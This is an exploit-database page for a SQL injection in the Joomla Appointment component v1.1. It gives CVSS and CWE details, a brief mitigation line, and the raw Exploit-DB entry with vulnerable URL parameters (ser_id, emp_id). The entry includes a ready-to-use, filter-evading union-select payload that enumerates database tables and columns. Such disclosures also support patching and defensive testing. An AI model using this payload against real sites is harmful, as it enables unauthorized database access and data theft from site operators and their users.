header-logo
Suggest Exploit
vendor:
Appointment
by:
Ihsan Sencan
5.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: Appointment
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE:
CPE: a:joomlaextensions:appointment:1.1
Metasploit:
Other Scripts:
Platforms Tested: Windows 7, Kali Linux
2017

Joomla! Component Appointment v1.1 – SQL Injection

The vulnerability allows the working user group to inject sql commands

Mitigation:

Apply proper input validation and sanitization techniques to prevent SQL Injection attacks.
Source

Exploit-DB raw data:

# # # # #
# Exploit Title: Joomla! Component Appointment v1.1 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Software Link: https://extensions.joomla.org/extensions/extension/appointment/
# Demo: http://joomlaextension.biz/appointment/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows the working user group to inject sql commands ...
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php/service-list?view=allorder&ser_id=[SQL] 
# -84+/*!11111union*/+/*!11111select*/+(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32))--+-
# 
# http://localhost/[PATH]/index.php/service-list?view=allorder&emp_id=[SQL]
# 
# <input type="hidden" name="sername" id="sername" value="............
# 
# Etc...
# # # # #